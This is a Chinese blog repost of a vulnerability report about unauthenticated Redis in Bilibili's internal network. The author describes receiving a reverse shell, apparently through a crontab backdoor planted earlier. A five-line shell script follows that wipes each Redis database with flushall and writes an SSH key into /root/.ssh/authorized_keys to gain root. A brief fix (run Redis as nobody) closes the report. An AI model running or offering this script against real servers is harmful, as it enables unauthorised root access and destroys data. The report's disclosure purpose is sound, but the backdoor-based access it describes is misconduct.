默认 redis 安装存在漏洞, 可以直接 获取 root 权限

转载地址:http://www.2cto.com/Article/201512/454117.html


我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。嗯,假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。
内网存在许多 redis 未授权访问,为什么不问问神奇海螺呢?

详细说明:

我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。

1.png

估计是之前留的 crontab 后门,不过这不重要。

前几天爆出了 redis 未授权访问然后写 authorized_keys 来强行拿权限,总之原理是如此如此,可以看
 http://www.2cto.com/Article/201512/454361.html 来了解具体利用。

在 B 站内网扫描了一下 6379 端口,然后写了一个 sh 脚本来自动化执行。
 

code 区域
?
1
2
3
4
5
<code>redis-cli  -h $ 1 flushall
     cat foo.txt | redis-cli -h $ 1 -x set 1
     redis-cli -h $ 1 config set dir /root/.ssh
     redis-cli -h $ 1 config set dbfilename authorized_keys
     redis-cli -h $ 1 save</code>

2.png

然后“姆Q”的一下子,成功了一个。

3.png

Bilibili (゜-゜)つロ 乾杯~

由于 redis 是用 root 权限启动的,所以直接能在 /root/.ssh/ 下面写文件。

5.png

4.png

漏洞证明:

3.png

5.png

4.png

如图所示

修复方案:

用 nobody 权限来启动 redis。,

另外测试的 172.16.0.208、172.16.0.203 的 authorized_keys 已恢复,crontab 后门已清理。


  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值